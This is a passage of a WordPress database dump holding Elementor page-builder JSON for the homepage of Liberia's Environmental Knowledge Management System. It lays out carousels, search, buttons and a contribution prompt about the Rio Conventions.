Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11485,1864,'_elementor_version','2.7.5'),(11486,1864,'_elementor_template_type','wp-page'),(11487,1864,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11490,1865,'_wp_page_template','default'),(11491,1865,'_elementor_edit_mode','builder'),(11492,1865,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":500,\"centered\":\"true\",\"speed\":300,\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa 